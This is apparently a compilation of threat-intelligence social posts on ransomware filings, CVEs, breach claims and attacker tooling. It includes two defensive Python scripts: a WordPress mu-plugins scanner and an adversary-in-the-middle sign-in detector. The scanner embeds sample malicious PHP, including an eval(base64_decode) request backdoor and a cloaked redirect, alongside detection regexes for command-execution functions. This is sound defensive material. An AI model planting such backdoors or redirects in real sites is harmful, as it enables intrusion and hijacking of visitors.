Healthcare provider DaVita Inc have filed an 8-K with the SEC for an ongoing ransomware incident.
https://www.sec.gov/Archives/edgar/data/927066/000119312525079593/d948299d8k.htm
Sensata Technologies Holding plc filed an 8-K with the SEC for a ransomware attack which is remarkably honest, and pretty much the textbook example of how to do it well. https://www.sec.gov/ix?doc=/Archives/edgar/data/1477294/000147729425000047/st-20250406.htm
We recently sat down with our Director of #ThreatIntel to talk about her role at Quad9 and what she enjoys about her work.
https://www.quad9.net/news/blog/staff-highlight-emilia-cebrat-maslowski
Oh, is it time for another Fortinet crit again? Unauthenticated admin password change in FortiSwitch.
CVE-2024-48887, CVSSv3 9.3
CVE-2025-29087 - SQLite Integer Overflow Through Concat Function April 07, 2025 at 08:15PM https://ift.tt/5ylMfts #CVE #IOC #CTI #ThreatIntelligence #ThreatIntel #Cybersecurity #Recon
LFTD Partners Inc. filed an 8-K with the SEC for a cyber incident.
They purchased $350k in cryptocurrency... and immediately had it stolen.
“On April 1, 2025, the Company converted $350,000 of its cash into USD Coin (USDC), a digital stablecoin pegged to the U.S. dollar. Shortly thereafter, the digital wallet containing the USDC was compromised by an unauthorized and unknown third party, resulting in the theft of the full amount.”
https://www.sec.gov/ix?doc=/Archives/edgar/data/1391135/000109690625000425/lsfp-20250401.htm
The Oracle cloud threat actor has told the BBC they plan to release European region Oracle Cloud Classic data this weekend. #threatintel
Security researchers reveal hackers abusing #WordPress MU-plugins to hide malicious code
MU-plugins run on every page, which makes them a good target for attackers. Researchers discovered three types of code used by attackers: redirect to a malicious site, backdoor, and hijacking of content and links.
Administrators are advised to remove unused plugins, update plugins as releases come out, and protect high-privilege accounts with strong passwords and MFA.
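A quick way to triage an mu-plugins directory for the three behaviours described above. This is an added example, not the researchers' tooling or anything from the WordPress project; the indicator regexes and the sample PHP files are my own constructions, and hits should be read as review candidates rather than verdicts.

```python
"""Heuristic triage of wp-content/mu-plugins/*.php for the three behaviours
described above (redirects, backdoors, content/link hijacking).

Added example, not the researchers' tooling. The indicator regexes are my own
assumptions; treat hits as review candidates, not verdicts."""
import re
import tempfile
from pathlib import Path

# (signal, regex, description). "backdoor" and "redirect" are strong on their
# own; "content_filter" and "hidden_markup" are weak and only count together,
# because plenty of legitimate plugins filter the_content.
INDICATORS = [
    ("backdoor", r"\beval\s*\(", "eval() of runtime data"),
    ("backdoor", r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", "decodes an obfuscated payload"),
    ("backdoor", r"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(", "OS command execution"),
    ("backdoor", r"\bfile_put_contents\s*\(.*\$_(?:GET|POST|REQUEST|FILES)", "writes request-controlled data to disk"),
    ("redirect", r"\bheader\s*\(\s*['\"]Location:\s*https?://", "hard-coded redirect to an external URL"),
    ("redirect", r"\bwp_redirect\s*\(\s*['\"]https?://", "wp_redirect() to an external URL"),
    ("redirect", r"window\.location(?:\.href)?\s*=\s*['\"]https?://", "JavaScript redirect in emitted markup"),
    ("content_filter", r"\badd_filter\s*\(\s*['\"](?:the_content|the_excerpt)['\"]", "hooks post content (weak)"),
    ("hidden_markup", r"display\s*:\s*none|<a\s+[^>]*href=['\"]https?://", "hidden element or external link (weak)"),
]
COMPILED = [(sig, re.compile(rx, re.I), desc) for sig, rx, desc in INDICATORS]

# Constructed sample files: one benign, one of each malicious type.
SAMPLES = {
    "benign.php": """<?php
/* Plugin Name: Maintenance notice (constructed benign sample) */
add_action('admin_notices', function () {
    echo '<div class="notice">Scheduled maintenance Sunday 02:00 UTC.</div>';
});
""",
    "redirect.php": """<?php
add_action('init', function () {
    if (!is_admin() && strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') === false) {
        header('Location: https://example.invalid/landing');
        exit;
    }
});
""",
    "backdoor.php": """<?php
if (isset($_REQUEST['k']) && md5($_REQUEST['k']) === '0cc175b9c0f1b6a831c399e269772661') {
    eval(base64_decode($_REQUEST['c']));
}
""",
    "hijack.php": """<?php
add_filter('the_content', function ($c) {
    return $c . '<div style="display:none"><a href="https://example.invalid/shop">shop</a></div>';
});
""",
}

def scan_source(src):
    """Return (signal, line_number, description) for every indicator hit."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for sig, rx, desc in COMPILED:
            if rx.search(line):
                hits.append((sig, lineno, desc))
    return hits

def classify(hits):
    """Collapse raw hits into the three categories used above."""
    signals = {sig for sig, _, _ in hits}
    verdict = signals & {"backdoor", "redirect"}
    if {"content_filter", "hidden_markup"} <= signals:
        verdict.add("content_hijack")
    return verdict

def scan_mu_plugins(mu_dir):
    """Scan top-level *.php in an mu-plugins directory; only those are auto-loaded by WordPress."""
    results = {}
    for path in sorted(Path(mu_dir).glob("*.php")):
        verdict = classify(scan_source(path.read_text(errors="replace")))
        if verdict:
            results[path.name] = sorted(verdict)
    return results

def demo():
    """Write the constructed samples to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        for name, src in SAMPLES.items():
            Path(d, name).write_text(src)
        return scan_mu_plugins(d)

if __name__ == "__main__":
    for name, cats in demo().items():
        print(f"{name}: {', '.join(cats)}")
```

Point it at a real wp-content/mu-plugins and compare the output against what you expect to be there; anything unexpected in that directory is worth reading line by line, since a file placed there needs no activation to run.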
Following up on the scanning and password spraying that @hrbrmstr and @greynoise have posted about today, I combined a list of IPs I'm seeing going after Palo Alto GlobalProtect with the Greynoise lists:
https://cascadiacrow.com/globalprotectips.txt
I also have a list of usernames attempted by those various IP addresses:
(recordedfuture.com) Apache Tomcat: Critical Path Equivalence Vulnerability (CVE-2025-24813) Under Active Exploitation https://www.recordedfuture.com/blog/apache-tomcat-cve-2025-24813-vulnerability-analysis
According to Recorded Future the Apache Tomcat vulnerability is now under active exploitation.
Summary:
This article details CVE-2025-24813, a critical path equivalence vulnerability in Apache Tomcat that allows unauthenticated remote code execution under specific conditions. The vulnerability affects multiple Tomcat versions (11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, 9.0.0-M1 to 9.0.98, and most 8.5.x versions). Greynoise has identified six malicious IP addresses attempting to exploit this vulnerability, targeting systems in the US, Japan, Mexico, South Korea, and Australia. Multiple proof-of-concept exploits have been published, increasing the risk of exploitation. Organizations are advised to upgrade to patched versions (11.0.3, 10.1.35, or 9.0.99) or implement network-level controls if immediate patching isn't possible.
(sophos.com) Evilginx: How Attackers Bypass MFA Through Adversary-in-the-Middle Attacks https://news.sophos.com/en-us/2025/03/28/stealing-user-credentials-with-evilginx/
A short descriptive article about Evilginx and how stealing credentials work, a few suggested ways of detecting etc.
Summary:
This article examines Evilginx, a tool that leverages the legitimate nginx web server to conduct Adversary-in-the-Middle (AitM) attacks that can bypass multifactor authentication (MFA). The tool works by proxying web traffic through malicious sites that mimic legitimate services like Microsoft 365, capturing not only usernames and passwords but also session tokens. The article demonstrates how Evilginx operates, showing how attackers can gain full access to a user's account even when protected by MFA. It provides detection methods through Azure/Microsoft 365 logs and suggests both preemptive and reactive mitigations, emphasizing the need to move toward phishing-resistant FIDO2-based authentication methods.
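The detection idea in the summary above, as an added example over sign-in logs (my own heuristic, not the logic in the Sophos article). A reverse proxy like Evilginx relays the victim's password and MFA response to the real identity provider from the proxy's own address, so the MFA-satisfied interactive sign-in is logged from an IP the user has never used, and the stolen session cookie is then replayed from the attacker's machine without a new MFA prompt. Field names follow Entra ID sign-in log exports; the records, users and baseline are constructed.

```python
"""Token-replay heuristic for the AitM pattern described above, added as an
example (not Sophos' detection logic). Field names follow Entra ID sign-in log
exports (userPrincipalName, createdDateTime, ipAddress, isInteractive,
authenticationRequirement); the records and users are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Why this works: a reverse proxy such as Evilginx sends the victim's credentials
# and MFA response to the real IdP from the proxy's own address, so the
# interactive, MFA-satisfied sign-in is logged from an IP the user never used.
# The stolen session cookie is then replayed, without an MFA prompt, from
# wherever the attacker sits, typically within minutes.
EVENTS = [
    # alice: phished. MFA sign-in from the proxy IP, cookie replayed from another IP.
    {"userPrincipalName": "alice@example.com", "createdDateTime": "2025-03-28T09:00:00+00:00",
     "ipAddress": "198.51.100.7", "isInteractive": True,
     "authenticationRequirement": "multiFactorAuthentication"},
    {"userPrincipalName": "alice@example.com", "createdDateTime": "2025-03-28T09:03:00+00:00",
     "ipAddress": "192.0.2.55", "isInteractive": False,
     "authenticationRequirement": "singleFactorAuthentication"},
    # bob: normal. MFA sign-in and token use from his usual address.
    {"userPrincipalName": "bob@example.com", "createdDateTime": "2025-03-28T09:10:00+00:00",
     "ipAddress": "203.0.113.20", "isInteractive": True,
     "authenticationRequirement": "multiFactorAuthentication"},
    {"userPrincipalName": "bob@example.com", "createdDateTime": "2025-03-28T09:12:00+00:00",
     "ipAddress": "203.0.113.20", "isInteractive": False,
     "authenticationRequirement": "singleFactorAuthentication"},
    # carol: new address hours later, outside the replay window; not flagged here.
    {"userPrincipalName": "carol@example.com", "createdDateTime": "2025-03-28T09:00:00+00:00",
     "ipAddress": "203.0.113.30", "isInteractive": True,
     "authenticationRequirement": "multiFactorAuthentication"},
    {"userPrincipalName": "carol@example.com", "createdDateTime": "2025-03-28T13:00:00+00:00",
     "ipAddress": "203.0.113.31", "isInteractive": False,
     "authenticationRequirement": "singleFactorAuthentication"},
]

# Per-user IPs seen over a prior baseline period (constructed).
BASELINE = {
    "alice@example.com": {"203.0.113.10"},
    "bob@example.com": {"203.0.113.20"},
    "carol@example.com": {"203.0.113.30"},
}

def detect_aitm(events, baseline, window_minutes=30):
    """Flag (1) interactive MFA sign-ins from an IP outside the user's baseline and
    (2) any later sign-in within the window from a different, unfamiliar IP."""
    alerts = []
    by_user = defaultdict(list)
    for e in events:
        by_user[e["userPrincipalName"]].append(e)
    for user, evs in by_user.items():
        evs.sort(key=lambda e: datetime.fromisoformat(e["createdDateTime"]))
        known = baseline.get(user, set())
        anchor = None  # (time, ip) of the most recent interactive MFA sign-in
        for e in evs:
            t = datetime.fromisoformat(e["createdDateTime"])
            ip = e["ipAddress"]
            if e["isInteractive"] and e["authenticationRequirement"] == "multiFactorAuthentication":
                anchor = (t, ip)
                if ip not in known:
                    alerts.append({"user": user, "type": "mfa_signin_from_unfamiliar_ip",
                                   "ip": ip, "time": e["createdDateTime"]})
                continue
            if anchor is None:
                continue
            anchor_time, anchor_ip = anchor
            if t - anchor_time <= timedelta(minutes=window_minutes) and ip != anchor_ip and ip not in known:
                alerts.append({"user": user, "type": "session_used_from_new_ip_after_mfa",
                               "ip": ip, "mfa_ip": anchor_ip, "time": e["createdDateTime"]})
    return alerts

if __name__ == "__main__":
    for a in detect_aitm(EVENTS, BASELINE):
        print(a)
```

A bare IP-change rule is noisy for mobile and VPN users; in production, compare ASN or country rather than raw address, build the baseline from several weeks of history, and treat a hit as a reason to revoke the user's sessions and check for new MFA methods or device registrations, not as a final verdict.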
Update: security vendor Resecurity hacked Blacklock and published their shell history, accounts etc.
So this is what I was dancing about last night - DomainTools Investigations researchers uncovered nearly 900 connected domains spoofing defense and aerospace firms involved in the Ukraine conflict.
Fine that H-ISAC is publishing this out of "an abundance of caution," but the originating account looks like total crap. I do not think ISIS-K is planning car bombings of hospitals, nor has any evidence been presented that they are.
(checkpoint.com) VanHelsingRaaS: Analysis of a New and Rapidly Expanding Ransomware-as-a-Service Program
https://research.checkpoint.com/2025/vanhelsing-new-raas-in-town/
Last week Cyfirma released a short article and "analysis" about the VanHelsing RaaS, and here comes a meatier one from Check Point.
VanHelsingRaaS is a new ransomware-as-a-service program launched on March 7, 2025, that has quickly gained traction in the cybercrime world. Within just two weeks of its introduction, it infected three victims and demanded large ransom payments. The service offers free access to reputable affiliates while new affiliates must pay a $5,000 deposit. Affiliates receive 80% of ransom payments, with 20% going to the RaaS operators. The ransomware targets multiple platforms including Windows, Linux, BSD, ARM, and ESXi systems, significantly expanding its attack surface. The program follows typical Russian cybercrime behavior by prohibiting encryption of systems in CIS countries.
Whoa, check this out! Head Mare and Twelve are teaming up! Two threat groups joining forces... sounds like things are about to get real.
And guess what? The WinRAR exploit (CVE-2023-38831) and Exchange (ProxyLogon) are *still* being used. Seriously, folks, patch your systems! Phishing and supply chain attacks are still a major problem too.
This reminds me of a pentest where we almost missed the forest for the trees. You know, sometimes it's the simple stuff that makes all the difference.
So, what's the takeaway here? Patch everything, harden your systems, train your employees, and audit those supply chains! Oh, and network segmentation? It's worth its weight in gold! Don't overlook it!
I'm curious, what's the craziest security blunder you've ever witnessed firsthand? Spill the beans!
Somebody is claiming to have exfiltrated 6 million lines of data with Oracle Cloud’s SSO and LDAP that includes JKS files, encrypted SSO passwords, key files and enterprise manager JPS keys from servers on login.*.oraclecloud.com
The poster has no prior reputation, it is unclear if they're LARPing. Some of the sample data does align with prior infostealer logs, I'm told. https://breachforums.st/Thread-SELLING-Oracle-cloud-traditional-hacked-login-X-oraclecloud-com
Black Basta ransomware group is indeed dead, post hack and dump of their chats. #threatintel #ransomware
Blacklock ransomware group aka El Dorado aka Dragon Force appear to have been hacked. Or should I say free pentest. #threatintel
I wrote about a Bumblebee sample using ISO > LNK and DLL back in 2022.
https://axelarator.github.io/posts/bumblebee/
The Record’s report also states “They added that the Smart App Control also blocks malicious files from the Internet.” Except not completely (and it can also circumvent SmartScreen), as can be seen in another write-up on LNK Stomping, thanks to findings by Elastic Security.